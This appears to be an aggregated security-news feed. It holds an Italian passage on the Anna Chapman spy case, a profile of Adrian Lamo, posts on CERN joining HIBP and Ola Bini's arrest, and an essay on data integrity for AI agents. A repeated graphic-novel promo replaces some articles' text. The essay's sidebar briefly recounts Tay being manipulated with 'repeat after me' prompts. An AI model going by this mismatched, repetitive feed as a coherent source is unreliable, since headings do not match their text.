a far parte di un accordo di scambio di spionaggio tra Stati Uniti e Russia, il più grande del suo genere dal 1986. I dieci agenti russi tornarono in Russia tramite un jet noleggiato che atterrava a Vienna Aeroporto internazionale in Austria, dove lo scambio è avvenuto la mattina dell’8 luglio 2010. Il jet russo è tornato all’aeroporto Domodedovo di Mosca dove, dopo l’atterraggio, le dieci spie sono state tenute lontane dalla stampa locale ed internazionale. Secondo una dichiarazione del suo avvocato americano Robert Baum, la Chapman avrebbe voluto trasferirsi nel Regno Unito visto che era in possesso del passaporto britannico. Il Ministero degli Interni esercitò poteri speciali tramite il ministro degli Interni britannico per revocare la cittadinanza britannica a Chapman per impedirne il ritorno nel Regno Unito. Sicuramente leggendo tutto questo a posteriori, la Chapman così tanto osannata dalla stampa come “hacker”, aveva ben poco di “hacker”, se non una persona che sapeva utilizzare la tecnologia per attività di spionaggio e sapeva eseguire gli ordini. Il nome “Anna Chapman”, era altamente fuorviante in una nazione straniera, visto il suo forte accento russo. Molti che l’hanno incontrata avranno trovato strano che una donna russa avesse un cognome così. E anche se avesse spiegato che era il cognome del suo ex marito, ciò avrebbe solo portato a ulteriori analisi visto che era divorziata e non aveva figli. Si potrebbe sospettare che la sua scelta di non tornare al suo cognome da nubile significhi che stava cercando di nascondere la sua precedente identità russa. Altri alias del gruppo di spie erano Donald Heathfield, Tracey Ann Foley, Richard Murphy, Cynthia Murphy e Patricia Mills. Se un americano fosse immigrato in Russia e si fosse presentato come Alexei Yaroslav Kozlov, questo non avrebbe giustamente suscitato sospetti? Le reti wireless crittografate fanno scattare le bandiere rosse. Sebbene sia difficile o impossibile ottenere i dati trasferiti tramite reti wireless crittografate durante il transito, la presenza stessa di tali reti è altamente sospetta. Un modo migliore per trasferire file segreti è farlo in modo così nascosto che il trasferimento stesso sarebbe molto difficile da rilevare. Quasi tutti gli utenti di laptop negli aeroporti e nei bar si collegheranno al punto di accesso wireless per ottenere l’accesso a Internet. Se c’è una rete wireless crittografata tra due utenti (probabilmente che non sono nemmeno seduti insieme), c’è sicuramente qualcosa di losco in corso. Betti RHC, la prima graphic novel al mondo dedicata alla cybersecurity awareness, ha finalmente il suo sito ufficiale. Uno spazio tutto suo dove scoprire il progetto, sfogliare le copertine degli episodi e immergersi nel mondo di Betti: la giovane laureanda in informatica che, dopo la morte misteriosa del padre, si trasforma nell'hacker più potente del mondo. Una storia avvincente che, episodio dopo episodio, affronta una minaccia digitale diversa — dal phishing al ransomware, fino al cyberbullismo — e insegna a riconoscerla e a difendersi, senza che sembri mai una lezione. Sul sito trovate tutto ciò che rende Betti un progetto diverso dal solito: la sua filosofia, le anteprime delle tavole e il racconto di come nasce ogni volume. Perché dietro Betti RHC c'è solo lavoro umano: ogni tavola è disegnata interamente a mano dagli artisti del Gruppo Arte di Red Hot Cyber, senza alcun uso di intelligenza artificiale. E a garantire che ogni storia sia realistica e tecnicamente corretta c'è la supervisione degli hacker etici del gruppo HackerHood, che mantengono il racconto fedele al mondo reale della sicurezza informatica. C'è spazio anche per le aziende, che possono usare Betti come strumento di awareness diverso dai soliti corsi: acquistare i volumi, personalizzarli con il proprio brand o sponsorizzare nuovi episodi. E come primo regalo, l'episodio "Byte the Silence", dedicato al cyberbullismo, è scaricabile gratuitamente per uso personale. Perché la miglior difesa, in fondo, è una bella storia. 👉 Scopri tutto su https://betti.redhotcyber.com/
redhotcyber.comFeb 23, 2026extracted
LLM: Parassiti di Wikipedia. L’importanza dell’uomo nell’era dell’intelligenza artificiale
Betti RHC, la prima graphic novel al mondo dedicata alla cybersecurity awareness, ha finalmente il suo sito ufficiale. Uno spazio tutto suo dove scoprire il progetto, sfogliare le copertine degli episodi e immergersi nel mondo di Betti: la giovane laureanda in informatica che, dopo la morte misteriosa del padre, si trasforma nell'hacker più potente del mondo. Una storia avvincente che, episodio dopo episodio, affronta una minaccia digitale diversa — dal phishing al ransomware, fino al cyberbullismo — e insegna a riconoscerla e a difendersi, senza che sembri mai una lezione. Sul sito trovate tutto ciò che rende Betti un progetto diverso dal solito: la sua filosofia, le anteprime delle tavole e il racconto di come nasce ogni volume. Perché dietro Betti RHC c'è solo lavoro umano: ogni tavola è disegnata interamente a mano dagli artisti del Gruppo Arte di Red Hot Cyber, senza alcun uso di intelligenza artificiale. E a garantire che ogni storia sia realistica e tecnicamente corretta c'è la supervisione degli hacker etici del gruppo HackerHood, che mantengono il racconto fedele al mondo reale della sicurezza informatica. C'è spazio anche per le aziende, che possono usare Betti come strumento di awareness diverso dai soliti corsi: acquistare i volumi, personalizzarli con il proprio brand o sponsorizzare nuovi episodi. E come primo regalo, l'episodio "Byte the Silence", dedicato al cyberbullismo, è scaricabile gratuitamente per uso personale. Perché la miglior difesa, in fondo, è una bella storia. 👉 Scopri tutto su https://betti.redhotcyber.com/
redhotcyber.comNov 12, 2025extracted
Hacker famosi: la storia di Andrian Lamo
Adrian Lamo è stato un hacker che ha trovato nuovi modi per violare le aziende e fargli comprendere quanto erano insicure. Dai primi hack fino ad arrivare ad attacchi informatici verso aziende di prestigio mentre vagabondava con il suo zaino fino all’essere chiamato “spia” dalla comunità degli hacker, Adrian è stato una figura controversa nel mondo dell’hacking ma altamente interessante. Adrián Alfonso Lamo Atwood è nato a Malden, Massachusetts, USA, il 20 febbraio 1981. Ha frequentato il liceo a San Francisco, ma ha abbandonato dopo molte discussioni con i suoi insegnanti. Non si è laureato ma ha studiato giornalismo all’American River College di Carmichael, in California. Le sue competenze informatiche erano principalmente da autodidatta. Infatti, Adrian ha avuto il suo primo computer, un Commodore 64 in giovane età. In seguito si è interessato e ha familiarizzato con l’hacking del software sperimentando la programmazione utilizzata per creare i videogiochi a cui amava giocare. Il suo viaggio nell’hacking è iniziato hackerando dei giochi per computer, creando virus su floppy disk e infine facendo pratica con il phreaking telefonico. È stato in grado di effettuare chiamate interurbane gratuite attingendo alle linee telefoniche di estranei e trovando modi per falsificare le sue chiamate dalle compagnie telefoniche per passare inosservato. A metà degli anni ’90 ha iniziato a utilizzare un semplice browser web ed esplorare il web e trovare falle di sicurezza delle aziende. Era inconsapevolmente guidato dalla cosiddetta “cultura Hacker”, dove gli individui godono della sfida intellettuale di superare i limiti dei sistemi, usando la loro ingegno, arte e creatività, per raggiungere i loro obiettivi individuali. Non era importante quanto fossero grandi le aziende o di quanto fossero sensibili le informazioni in esse contenute, ma piuttosto era importante trovare qualcosa che non era mai stato trovato prima. Descrisse la sicurezza delle aziende di allora come una catastrofe, diceva che non era poi così difficile trovare falle di sicurezza ed introdursi nelle reti. Ha iniziato ad esplorare il Web trascorrendo innumerevoli ore presso la Biblioteca Pubblica di San Francisco, utilizzando i loro terminali Internet utilizzando telnet ad altri sistemi, compresi quelli che gli permettevano di usare i loro modem per effettuare chiamate in uscita. Nel 1997, Adrian stava osservando l’esplosione del business su Internet con un misto tra eccitazione e preoccupazione, soprattutto per i pericoli che nessuno poteva vedere ma che per lui erano reali e concreti. Visse come un vagabondo per ben due anni, con a tracolla il suo zaino e il suo fido portatile, viaggiando in lungo e in largo il paese utilizzano gli autobus, dormendo in edifici abbandonati e sui divani degli amici mentre si collegava a Internet dalle biblioteche universitarie e dalle postazioni laptop di Kinko. Durante questo periodo, stava dormendo in un edificio abbandonato sotto il ponte Ben Franklin di Philadelfia quando scoprì delle vulnerabilità di sicurezza su Excite@Home. Avvertì immediatamente i dirigenti delle falle, ma all’inizio non è stata intrapresa alcuna azione. Il suo primo ISP è stato AOL, ed era curioso di sapere cosa succedeva dietro le quinte. Era così ossessionato di scoprire come funzionasse un grande ISP che trovò delle vulnerabilità e riuscì ad accedere all’interno della rete. Divenne famoso da adolescente, nei primi anni 2000, dopo una serie di attacchi contro grandi aziende perché voleva dimostrare che se qualcuno come Andrian Lamo, che stava prendendo in prestito Internet da un locale a Kinko, potesse entrare in aziende come AOL, Yahoo, Microsoft e persino il New York Times con tale facilità, chiunque avrebbe potuto farlo. Cercava server proxy mal configurati, riusciva ad aggirare i firewall aziendali. È entrato in uno strumento CMS non protetto sul sito di notizie di Yahoo e ha cercato di avvisare l’azienda, proprio come ha fatto con altre vulnerabilità che aveva trovato all’interno delle infrastrutture di altre aziende, ma nessuno gli ha prestato attenzione. Pensò quindi che l’unico modo per far alzare l’attenzione per risolvere questi problemi, era andare dalla stampa e far conoscere questa storia. Andò quindi dai Reuters e una volta pubblicata, le cose si scaldarono rapidamente. Adrian Lamo (a sinistra) e Kevin Poulsen di Wired (a destra) nel 2001 Nel 2002 riuscì a penetrare nella rete interna del noto quotidiano The New York Times, ma in questo caso decise di divertirsi un po’. Riuscì ad entrare come amministratore del sistema e ottenne l’accesso a un database contenente i dati di oltre 3000 collaboratori del giornale. Si è poi aggiunto al database interno come esperto del giornale, soprattutto come “esperto di hacking”. Il Times una volta appreso dell’hack contattò immediatamente l’FBI per iniziare l’indagine. Nel 2003, l’FBI ha emesso un mandato di arresto per Adrian il quale nel 2004 si è dichiarato colpevole, con conseguente multa e sei mesi di detenzione domiciliare, seguiti da due anni di libertà vigilata. Ma sapeva che anche dopo, le autorità federali lo stavano costantemente monitorando. Nel 2010, Lamo si è unito alla crescente lista di hacker informatici a cui è stata diagnosticata la sindrome di Asperger, come Gary McKinnon e Albert Gonzalez. Di solito, questa diagnosi arriva quando l’hacker affronta la giustizia penale per la prima volta, piuttosto che sei anni dopo, come nel caso di Lamo. L’articolo è stato scritto dal giornalista Kevin Poulsen, che era lui stesso un ex hacker e giornalista di Wired. Chelsea Manning era un ex soldato americano (ex Bradley Manning) e noto per essere un attivista e un informatore. Nel 2010, Chelsea, che all’epoca si trovava a Baghdad, era già in attesa di essere dimessa per “disturbo dell’adattamento” (disturbo dell’identità di genere) perché ha espresso i suoi sentimenti incerti sulla sua (sua all’epoca) identità di genere, facendole perdere il lavoro come soldato. Ha contattato Adrian il 20 maggio 2010 tramite e-mail crittografate perché era già a conoscenza dei suoi incidenti di hacking negli anni 2000. Si sentiva isolata e fragile e pensava che Adrian fosse qualcuno che potesse capire la sua situazione. In una serie di chat su AOL tra il 21 e il 25 maggio, Chelsea, usando il nickname bradass87, e presentandosi come un ufficiale dei servizi segreti dell’esercito, senza aspettare una risposta, ha alluso ad Adrian le fughe di notizie dicendogli che era materiale classificato. Ha poi fatto riferimento a una versione dell’articolo di Wikipedia su Wikileaks e ha indicato che alcune delle sezioni sul video trapelato dell’attacco aereo di Baghdad erano anche sue. Serie di chat tra Adrian e Chelsea Chelsea ha iniziato ad aiutare e fornire a WikiLeaks storie/contenuti trapelati alla fine del 2009 quando si è trovata coinvolta in qualcosa a cui era completamente contraria. Ha fatto trapelare vario materiale tra cui video di attacchi aerei a Bagdad, in Afghanistan, migliaia di cablogrammi diplomatici degli Stati Uniti (i cablogrammi contenevano analisi diplomatiche dei leader mondiali e la valutazione dei diplomatici dei paesi ospitanti e dei loro funzionari) e mezzo milione di rapporti dell’esercito che in seguito divenne noto come “Iraq War Logs” e “Afghan War Diary”. Chelsea venne accusata di diversi reati, comprese le violazioni degli articoli 92 e 134 dell’Uniform Code of Military Justice e dell’Espionage Act. Adrian Lamo (al centro) esce da un tribunale a Fort Meade, Md., dove si è tenuta la corte marziale di Chelsea Manning, il 20 dicembre 2011. Adrian, successivamente a questi fatti venne ampiamente criticato dalla comunità hacker, come alla conferenza “Hackers on Planet Earth” nel 2010, che lo etichettarono come un “spia”. Successivamente nei primi anni del 2011, Adrian era sotto protezione in quanto venne sostenuto che la sua “vita era in pericolo” dopo aver consegnato Manning che poi venne incarcerata dal sistema giudiziario militare statunitense e successivamente condannata a 35 anni di carcere. Tuttavia, il presidente Barrack Obama ha commutato la condanna a un totale di sette anni alla fine del suo mandato presidenziale. È stata rilasciata per la prima volta dal carcere il 17 maggio 2017, ma ha trascorso anni difficili dentro e fuori dai tribunali dove le sono state notificate più citazioni in giudizio per testimoniare contro il caso di WikiLeaks e Julian Assange, anche se si rifiutò più volte. L’11 marzo 2020, ha cercato di suicidarsi nella prigione in cui era detenuta, un paio di giorni prima che fosse previsto che comparisse davanti a un giudice su una mozione per porre fine alle sanzioni. Si è ripresa bene in ospedale e il gran giurì ha deciso che la sua testimonianza non era più necessaria. Il giudice ha ritenuto che la sua detenzione non fosse più necessaria ed è stata rilasciata. Ha ricevuto numerosi premi nel corso degli anni e ha fatto numerose apparizioni in TV e nelle università, rilasciando interviste e parlando. Adrian morì inaspettatamente il 14 marzo 2018, all’età di 37 anni in Kansas. La sua morte è stata resa pubblica dal post di suo padre su Facebook che scrisse: “Con grande tristezza e il cuore spezzato devo far sapere a tutti gli amici e conoscenti di Adrian che è morto. Una mente brillante e un’anima compassionevole se ne sono andate, era il mio amato figlio.” Hanno trovato diverse bottiglie di pillole nella sua casa e il medico legale, Scott Kipper, che ha gestito l’autopsia di Adrian, ha spiegato che non poteva nemmeno essere escluso l’omicidio. Ha sottolineato diverse irregolarità nel caso di Lamo, come un adesivo trovato sulla coscia sinistra di Adrian, che diceva “Adrian Lamo, assistente alla regia, ProjectVigilant, 70 Bates Street, NW, Washington, DC”. Dopo tre mesi, il rapporto forense regionale della contea di Sedwick non ha mostrato alcuna causa definitiva di morte, nonostante un’autopsia completa. Era stata trovata una lunga lista di sostanze chimiche nel sangue di Lamo come Benadryl, clorfeniramina, citalopram, gabapentin, clonazepam, etizolam, flubromazepam e alcune di esse erano benzodiazepine prescritte dal suo medico per curare il suo disturbo d’ansia. Tuttavia, secondo i medici legali, quei farmaci non erano sufficienti per uccidere Adrian. Probabilmente la causa della morte è stata per un sovra dosaggio per placare la sua folle ansia. La causa più probabile della morte di Adrian è stata che ha inconsapevolmente combinato le benzodiazepine con il kratom, una droga ricreativa. La FDA ha pubblicato un avviso medico appena un mese prima che Adrian morì con un avvertimento contro la miscelazione delle benzodiazepine con il kratom, una combinazione che era stata collegata a dozzine di morti. Adrian Lamo era il tipo di hacker che voleva sfidare gli altri trovando modi diversi per convincere le aziende a prendere sul serio la sicurezza informatica. Il suo ruolo era quello di trovare modi nuovi e non convenzionali di accedere alle reti e superare le barriere invisibili. Rimarrà per sempre un personaggio molto poco raccomandabile e una figura controversa nella comunità hacker. Betti RHC, la prima graphic novel al mondo dedicata alla cybersecurity awareness, ha finalmente il suo sito ufficiale. Uno spazio tutto suo dove scoprire il progetto, sfogliare le copertine degli episodi e immergersi nel mondo di Betti: la giovane laureanda in informatica che, dopo la morte misteriosa del padre, si trasforma nell'hacker più potente del mondo. Una storia avvincente che, episodio dopo episodio, affronta una minaccia digitale diversa — dal phishing al ransomware, fino al cyberbullismo — e insegna a riconoscerla e a difendersi, senza che sembri mai una lezione. Sul sito trovate tutto ciò che rende Betti un progetto diverso dal solito: la sua filosofia, le anteprime delle tavole e il racconto di come nasce ogni volume. Perché dietro Betti RHC c'è solo lavoro umano: ogni tavola è disegnata interamente a mano dagli artisti del Gruppo Arte di Red Hot Cyber, senza alcun uso di intelligenza artificiale. E a garantire che ogni storia sia realistica e tecnicamente corretta c'è la supervisione degli hacker etici del gruppo HackerHood, che mantengono il racconto fedele al mondo reale della sicurezza informatica. C'è spazio anche per le aziende, che possono usare Betti come strumento di awareness diverso dai soliti corsi: acquistare i volumi, personalizzarli con il proprio brand o sponsorizzare nuovi episodi. E come primo regalo, l'episodio "Byte the Silence", dedicato al cyberbullismo, è scaricabile gratuitamente per uso personale. Perché la miglior difesa, in fondo, è una bella storia. 👉 Scopri tutto su https://betti.redhotcyber.com/
redhotcyber.comOct 18, 2025extracted
Welcoming CERN to Have I Been Pwned
It's hard to explain the significance of CERN. It's the birthplace of the World Wide Web and the home of the largest machine ever built, the Large Hadron Collider. The bit that's hard to explain is, well, I mean, look at it! Charlotte and I visited CERN in 2019, nestled in there between Switzerland and France, and descended into the mountainside where we saw the world's largest particle accelerator firsthand. I can't explain this! The physics are just mind-bending. A few months ago, we headed back there and saw even more stuff I can't explain: How on earth do you make antimatter?! I know there's a lot of magnets involved, but that's about the limit of my understanding. But what I do understand a little better is the importance of CERN. They're working to help humanity understand the most profound questions about the universe by exploring fundamental physics—the very building blocks of nature. And closer to my heart (or at least to my expertise), their role in the World Wide Web and the contribution CERN has made to the internet as we know it today cannot be overstated. It's also staffed by passionate individuals with a love of science that transcends borders and politics, including many from parts of the world that don't normally see eye-to-eye. This passion was evident on both our visits, and perhaps that's an extra poignant observation in a time with so much conflict. In relation to HIBP and our ongoing support of governments, CERN is similar yet different. It's an intergovernmental organisation operating outside the jurisdiction of any one nation. However, they face the same online threats, and just like sovereign government states, their people sign up to services that get breached and end up in HIBP. And, like the governments we support, services that can be provided to help them tackle that threat are always appreciated. I was surprised to hear on our last visit that the sum total of contributions from their member states amounts to the price of a cup of coffee per person per year! For the work they do and the contribution they make to society, onboarding CERN as the 41st (inter)government was a no-brainer. They now have full and free access to query all CERN domains across the breadth of HIBP data. Welcome aboard CERN!
troyhunt.comSep 29, 2025extracted
Wikipedia nel mirino del Congresso USA: quando la libertà di espressione diventa “sorvegliata speciale”
Betti RHC, la prima graphic novel al mondo dedicata alla cybersecurity awareness, ha finalmente il suo sito ufficiale. Uno spazio tutto suo dove scoprire il progetto, sfogliare le copertine degli episodi e immergersi nel mondo di Betti: la giovane laureanda in informatica che, dopo la morte misteriosa del padre, si trasforma nell'hacker più potente del mondo. Una storia avvincente che, episodio dopo episodio, affronta una minaccia digitale diversa — dal phishing al ransomware, fino al cyberbullismo — e insegna a riconoscerla e a difendersi, senza che sembri mai una lezione. Sul sito trovate tutto ciò che rende Betti un progetto diverso dal solito: la sua filosofia, le anteprime delle tavole e il racconto di come nasce ogni volume. Perché dietro Betti RHC c'è solo lavoro umano: ogni tavola è disegnata interamente a mano dagli artisti del Gruppo Arte di Red Hot Cyber, senza alcun uso di intelligenza artificiale. E a garantire che ogni storia sia realistica e tecnicamente corretta c'è la supervisione degli hacker etici del gruppo HackerHood, che mantengono il racconto fedele al mondo reale della sicurezza informatica. C'è spazio anche per le aziende, che possono usare Betti come strumento di awareness diverso dai soliti corsi: acquistare i volumi, personalizzarli con il proprio brand o sponsorizzare nuovi episodi. E come primo regalo, l'episodio "Byte the Silence", dedicato al cyberbullismo, è scaricabile gratuitamente per uso personale. Perché la miglior difesa, in fondo, è una bella storia. 👉 Scopri tutto su https://betti.redhotcyber.com/
redhotcyber.comSep 2, 2025extracted
163: Ola
In 2019, Ola Bini, a Swedish programmer and privacy advocate, was arrested in Ecuador for being a Russian hacker. Find Ola on X: https://x.com/olabini . Or visit his website https://olabini.se/blog/ . Or check out his non-profit https://autonomia.digital/ . Sponsors Support for this show comes from ThreatLocker® . ThreatLocker® is a Zero Trust Endpoint Protection Platform that strengthens your infrastructure from the ground up. With ThreatLocker® Allowlisting and Ringfencing™, you gain a more secure approach to blocking exploits of known and unknown vulnerabilities. ThreatLocker® provides Zero Trust control at the kernel level that enables you to allow everything you need and block everything else, including ransomware! Learn more at www.threatlocker.com . This show is sponsored by Miro . AI doesn’t have to be intimidating—in fact, it can help your team thrive. Miro’s Innovation Workspace changes that by bringing people and AI together to turn ideas into impact, fast. Whether you’re launching a new podcast, streamlining a process, or building the next big thing, Miro helps your team move quicker, collaborate better, and actually enjoy the work. Learn more at https://miro.com/ . This show is sponsored by Thales . With their industry-leading platforms, you can protect critical applications, data and identities – anywhere and at scale with the highest ROI. That’s why the most trusted brands and largest banks, retailers and healthcare companies in the world rely on Thales to protect what matters most – applications, data and identities. Learn more at http://thalesgroup.com/cyber . View all active sponsors. Sources https://www.eff.org/deeplinks/2019/08/ecuador-political-actors-must-step-away-ola-binis-case https://www.eff.org/deeplinks/2025/04/six-years-dangerous-misconceptions-targeting-ola-bini-and-digital-rights-ecuador https://peoplesdispatch.org/2019/04/12/ola-bini-detained-in-ecuador-for-90-days/ https://globalvoices.org/2022/10/21/ola-bini-the-cyberactivist-who-causes-panic-in-ecuador/ https://www.amnesty.org/en/latest/news/2019/09/ecuador-allanamiento-violento-pone-en-riesgo-juicio-justo-ola-bini-2/https://en.wikipedia.org/wiki/Ola_Bini
darknetdiaries.comSep 2, 2025extracted
AI Agents Need Data Integrity
AI Agents Need Data Integrity Think of the Web as a digital territory with its own social contract. In 2014, Tim Berners-Lee called for a “Magna Carta for the Web” to restore the balance of power between individuals and institutions. This mirrors the original charter’s purpose: ensuring that those who occupy a territory have a meaningful stake in its governance. Web 3.0—the distributed, decentralized Web of tomorrow—is finally poised to change the Internet’s dynamic by returning ownership to data creators. This will change many things about what’s often described as the “CIA triad” of digital security: confidentiality, integrity, and availability. Of those three features, data integrity will become of paramount importance. When we have agency in digital spaces, we naturally maintain their integrity—protecting them from deterioration and shaping them with intention. But in territories controlled by distant platforms, where we’re merely temporary visitors, that connection frays. A disconnect emerges between those who benefit from data and those who bear the consequences of compromised integrity. Like homeowners who care deeply about maintaining the property they own, users in the Web 3.0 paradigm will become stewards of their personal digital spaces. This will be critical in a world where AI agents don’t just answer our questions but act on our behalf. These agents may execute financial transactions, coordinate complex workflows, and autonomously operate critical infrastructure, making decisions that ripple through entire industries. As digital agents become more autonomous and interconnected, the question is no longer whether we will trust AI but what that trust is built upon. In the new age we’re entering, the foundation isn’t intelligence or efficiency—it’s integrity. What Is Data Integrity? In information systems, integrity is the guarantee that data will not be modified without authorization, and that all transformations are verifiable throughout the data’s life cycle. While availability ensures that systems are running and confidentiality prevents unauthorized access, integrity focuses on whether information is accurate, unaltered, and consistent across systems and over time. It’s a new idea. The undo button, which prevents accidental data loss, is an integrity feature. So is the reboot process, which returns a computer to a known good state. Checksums are an integrity feature; so are verifications of network transmission. Without integrity, security measures can backfire. Encrypting corrupted data just locks in errors. Systems that score high marks for availability but spread misinformation just become amplifiers of risk. All IT systems require some form of data integrity, but the need for it is especially pronounced in two areas today. First: Internet of Things devices interact directly with the physical world, so corrupted input or output can result in real-world harm. Second: AI systems are only as good as the integrity of the data they’re trained on, and the integrity of their decision-making processes. If that foundation is shaky, the results will be too. Integrity manifests in four key areas. The first, input integrity, concerns the quality and authenticity of data entering a system. When this fails, consequences can be severe. In 2021, Facebook’s global outage was triggered by a single mistaken command—an input error missed by automated systems. Protecting input integrity requires robust authentication of data sources, cryptographic signing of sensor data, and diversity in input channels for cross-validation. The second issue is processing integrity, which ensures that systems transform inputs into outputs correctly. In 2003, the U.S.-Canada blackout affected 55 million people when a control-room process failed to refresh properly, resulting in damages exceeding US $6 billion. Safeguarding processing integrity means formally verifying algorithms, cryptographically protecting models, and monitoring systems for anomalous behavior. Storage integrity covers the correctness of information as it’s stored and communicated. In 2023, the Federal Aviation Administration was forced to halt all U.S. departing flights because of a corrupted database file. Addressing this risk requires cryptographic approaches that make any modification computationally infeasible without detection, distributed storage systems to prevent single points of failure, and rigorous backup procedures. Finally, contextual integrity addresses the appropriate flow of information according to the norms of its larger context. It’s not enough for data to be accurate; it must also be used in ways that respect expectations and boundaries. For example, if a smart speaker listens in on casual family conversations and uses the data to build advertising profiles, that action would violate the expected boundaries of data collection. Preserving contextual integrity requires clear data-governance policies, principles that limit the use of data to its intended purposes, and mechanisms for enforcing information-flow constraints. As AI systems increasingly make critical decisions with reduced human oversight, all these dimensions of integrity become critical. The Need for Integrity in Web 3.0 As the digital landscape has shifted from Web 1.0 to Web 2.0 and now evolves toward Web 3.0, we’ve seen each era bring a different emphasis in the CIA triad of confidentiality, integrity, and availability. Returning to our home metaphor: When simply having shelter is what matters most, availability takes priority—the house must exist and be functional. Once that foundation is secure, confidentiality becomes important—you need locks on your doors to keep others out. Only after these basics are established do you begin to consider integrity, to ensure that what’s inside the house remains trustworthy, unaltered, and consistent over time. Web 1.0 of the 1990s prioritized making information available. Organizations digitized their content, putting it out there for anyone to access. In Web 2.0, the Web of today, platforms for e-commerce, social media, and cloud computing prioritize confidentiality, as personal data has become the Internet’s currency. Somehow, integrity was largely lost along the way. In our current Web architecture, where control is centralized and removed from individual users, the concern for integrity has diminished. The massive social media platforms have created environments where no one feels responsible for the truthfulness or quality of what circulates. Web 3.0 is poised to change this dynamic by returning ownership to the data owners. This is not speculative; it’s already emerging. For example, ActivityPub, the protocol behind decentralized social networks like Mastodon, combines content sharing with built-in attribution. Tim Berners-Lee’s Solid protocol restructures the Web around personal data pods with granular access controls. These technologies prioritize integrity through cryptographic verification that proves authorship, decentralized architectures that eliminate vulnerable central authorities, machine-readable semantics that make meaning explicit—structured data formats that allow computers to understand participants and actions, such as “Alice performed surgery on Bob”—and transparent governance where rules are visible to all. As AI systems become more autonomous, communicating directly with one another via standardized protocols, these integrity controls will be essential for maintaining trust. Why Data Integrity Matters in AI For AI systems, integrity is crucial in four domains. The first is decision quality. With AI increasingly contributing to decision-making in health care, justice, and finance, the integrity of both data and models’ actions directly impact human welfare. Accountability is the second domain. Understanding the causes of failures requires reliable logging, audit trails, and system records. The third domain is the security relationships between components. Many authentication systems rely on the integrity of identity information and cryptographic keys. If these elements are compromised, malicious agents could impersonate trusted systems, potentially creating cascading failures as AI agents interact and make decisions based on corrupted credentials. Finally, integrity matters in our public definitions of safety. Governments worldwide are introducing rules for AI that focus on data accuracy, transparent algorithms, and verifiable claims about system behavior. Integrity provides the basis for meeting these legal obligations. The importance of integrity only grows as AI systems are entrusted with more critical applications and operate with less human oversight. While people can sometimes detect integrity lapses, autonomous systems may not only miss warning signs—they may exponentially increase the severity of breaches. Without assurances of integrity, organizations will not trust AI systems for important tasks, and we won’t realize the full potential of AI. How to Build AI Systems With Integrity Imagine an AI system as a home we’re building together. The integrity of this home doesn’t rest on a single security feature but on the thoughtful integration of many elements: solid foundations, well-constructed walls, clear pathways between rooms, and shared agreements about how spaces will be used. We begin by laying the cornerstone: cryptographic verification. Digital signatures ensure that data lineage is traceable, much like a title deed proves ownership. Decentralized identifiers act as digital passports, allowing components to prove identity independently. When the front door of our AI home recognizes visitors through their own keys rather than through a vulnerable central doorman, we create resilience in the architecture of trust. Formal verification methods enable us to mathematically prove the structural integrity of critical components, ensuring that systems can withstand pressures placed upon them—especially in high-stakes domains where lives may depend on an AI’s decision. Just as a well-designed home creates separate spaces, trustworthy AI systems are built with thoughtful compartmentalization. We don’t rely on a single barrier but rather layer them to limit how problems in one area might affect others. Just as a kitchen fire is contained by fire doors and independent smoke alarms, training data is separated from the AI’s inferences and output to limit the impact of any single failure or breach. Throughout this AI home, we build transparency into the design: The equivalent of large windows that allow light into every corner is clear pathways from input to output. We install monitoring systems that continuously check for weaknesses, alerting us before small issues become catastrophic failures. But a home isn’t just a physical structure, it’s also the agreements we make about how to live within it. Our governance frameworks act as these shared understandings. Before welcoming new residents, we provide them with certification standards. Just as landlords conduct credit checks, we conduct integrity assessments to evaluate newcomers. And we strive to be good neighbors, aligning our community agreements with broader societal expectations. Perhaps most important, we recognize that our AI home will shelter diverse individuals with varying needs. Our governance structures must reflect this diversity, bringing many stakeholders to the table. A truly trustworthy system cannot be designed only for its builders but must serve anyone authorized to eventually call it home. That’s how we’ll create AI systems worthy of trust: not by blindly believing in their perfection but because we’ve intentionally designed them with integrity controls at every level. A Challenge of Language Unlike other properties of security, like “available” or “private,” we don’t have a common adjective form for “integrity.” This makes it hard to talk about it. It turns out that there is a word in English: “integrous.” The Oxford English Dictionary recorded the word used in the mid-1600s but now declares it obsolete. We believe that the word needs to be revived. We need the ability to describe a system with integrity. We must be able to talk about integrous systems design. The Road Ahead Ensuring integrity in AI presents formidable challenges. As models grow larger and more complex, maintaining integrity without sacrificing performance becomes difficult. Integrity controls often require computational resources that can slow systems down—particularly challenging for real-time applications. Another concern is that emerging technologies like quantum computing threaten current cryptographic protections. Additionally, the distributed nature of modern AI—which relies on vast ecosystems of libraries, frameworks, and services—presents a large attack surface. Beyond technology, integrity depends heavily on social factors. Companies often prioritize speed to market over robust integrity controls. Development teams may lack specialized knowledge for implementing these controls, and may find it particularly difficult to integrate them into legacy systems. And while some governments have begun establishing regulations for aspects of AI, we need worldwide alignment on governance for AI integrity. Addressing these challenges requires sustained research into verifying and enforcing integrity, as well as recovering from breaches. Priority areas include fault-tolerant algorithms for distributed learning, verifiable computation on encrypted data, techniques that maintain integrity despite adversarial attacks, and standardized metrics for certification. We also need interfaces that clearly communicate integrity status to human overseers. As AI systems become more powerful and pervasive, the stakes for integrity have never been higher. We are entering an era where machine-to-machine interactions and autonomous agents will operate with reduced human oversight and make decisions with profound impacts. The good news is that the tools for building systems with integrity already exist. What’s needed is a shift in mind-set: from treating integrity as an afterthought to accepting that it’s the core organizing principle of AI security. The next era of technology will be defined not by what AI can do, but by whether we can trust it to know or especially to do what’s right. Integrity—in all its dimensions—will determine the answer. Sidebar: Examples of Integrity Failures Ariane 5 Rocket (1996) Processing integrity failure A 64-bit velocity calculation was converted to a 16-bit output, causing an error called overflow. The corrupted data triggered catastrophic course corrections that forced the US $370 million rocket to self-destruct. NASA Mars Climate Orbiter (1999) Processing integrity failure Lockheed Martin’s software calculated thrust in pound-seconds, while NASA’s navigation software expected newton-seconds. The failure caused the $328 million spacecraft to burn up in the Mars atmosphere. Microsoft’s Tay Chatbot (2016) Processing integrity failure Released on Twitter, Microsoft‘s AI chatbot was vulnerable to a “repeat after me” command, which meant it would echo any offensive content fed to it. Boeing 737 MAX (2018) Input integrity failure Faulty sensor data caused an automated flight-control system to repeatedly push the airplane’s nose down, leading to a fatal crash. SolarWinds Supply-Chain Attack (2020) Storage integrity failure Russian hackers compromised the process that SolarWinds used to package its software, injecting malicious code that was distributed to 18,000 customers, including nine federal agencies. The hack remained undetected for 14 months. ChatGPT Data Leak (2023) Storage integrity failure A bug in OpenAI’s ChatGPT mixed different users’ conversation histories. Users suddenly had other people’s chats appear in their interfaces with no way to prove the conversations weren’t theirs. Midjourney Bias (2023) Contextual integrity failure Users discovered that the AI image generator often produced biased images of people, such as showing white men as CEOs regardless of the prompt. The AI tool didn’t accurately reflect the context requested by the users. Prompt 